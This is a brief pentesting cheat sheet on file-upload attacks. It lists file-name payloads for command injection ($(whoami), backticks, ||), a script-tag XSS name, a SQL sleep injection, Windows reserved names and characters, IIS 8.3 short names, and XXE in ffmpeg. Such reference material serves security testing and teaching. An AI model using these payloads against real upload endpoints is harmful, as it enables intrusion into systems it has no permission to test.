Other Upload Attacks
RCE in File Name
file$(whoami).jpg or file`whoami`.jpg or file.jpg||whoami
XSS in File Name
<script>alert(window.origin);</script>.jpgSQL Injection in File Name
file';select+sleep(5);--.jpgWindows Specific Attacks
|, <, >, *, or ?
CON, COM1, LPT1, or NUL
8.3_filename -> Eto ata ung shortname sa IIS server
Advance File Upload Attacks
things like xxe in ffmpeg
Last updated